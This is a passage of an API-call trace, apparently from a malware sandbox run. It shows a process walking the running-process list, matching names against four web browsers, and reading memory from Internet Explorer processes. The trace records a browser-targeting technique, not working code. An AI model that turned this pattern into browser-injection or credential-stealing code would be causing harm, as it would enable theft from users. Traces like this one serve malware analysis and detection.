	[0231.658] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0231.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.659] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.659] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0231.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.660] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0231.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6b64
	[0231.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.661] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0231.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.662] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.662] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0231.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.662] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0231.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6b68
	[0231.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.664] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0231.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.664] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.664] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0231.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.665] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0231.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6b6c
	[0231.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.666] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0231.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.667] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.667] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0231.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.667] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0231.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6b70
	[0231.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.668] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0231.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.669] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.669] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0231.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.670] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.670] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0231.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6b74
	[0231.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.671] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0231.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.672] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.672] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0231.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.672] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0231.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6b78
	[0231.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.673] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0231.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.674] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.674] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0231.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.674] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0231.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6b7c
	[0231.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.676] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0231.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.677] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.677] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0231.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.678] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0231.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6b80
	[0231.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.679] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0231.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.679] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.679] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0231.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.680] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0231.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6b84
	[0231.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.681] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0231.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.681] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.681] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0231.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.682] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0231.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6b88
	[0231.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.683] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0231.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.683] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.683] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0231.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.684] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0231.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6b8c
	[0231.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.685] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0231.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.686] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.686] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0231.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.687] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0231.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6b90
	[0231.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.688] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0231.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.689] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.689] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0231.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.690] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0231.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6b94
	[0231.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.691] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0231.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.691] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.692] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0231.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.693] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0231.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6b98
	[0231.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.694] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0231.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.695] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.696] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0231.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.696] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6b9c
	[0231.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.699] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.699] NtQueryInformationProcess (in: ProcessHandle=0x6b9c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.699] ReadProcessMemory (in: hProcess=0x6b9c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.699] ReadProcessMemory (in: hProcess=0x6b9c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.699] ReadProcessMemory (in: hProcess=0x6b9c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.699] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6ba0
	[0231.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.700] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.701] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.701] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.701] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.701] NtQueryInformationProcess (in: ProcessHandle=0x6ba0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.701] ReadProcessMemory (in: hProcess=0x6ba0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.702] ReadProcessMemory (in: hProcess=0x6ba0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.702] ReadProcessMemory (in: hProcess=0x6ba0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.702] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6ba4
	[0231.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.703] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.703] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.703] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0231.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6ba8
	[0231.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.705] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0231.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.705] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.705] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0231.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.706] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6bac
	[0231.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.707] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.707] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.708] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.708] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6bb0
	[0231.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.710] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.710] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.710] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.711] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6bb4
	[0231.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.712] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.712] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.713] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6bb8
	[0231.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.714] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.715] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.715] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
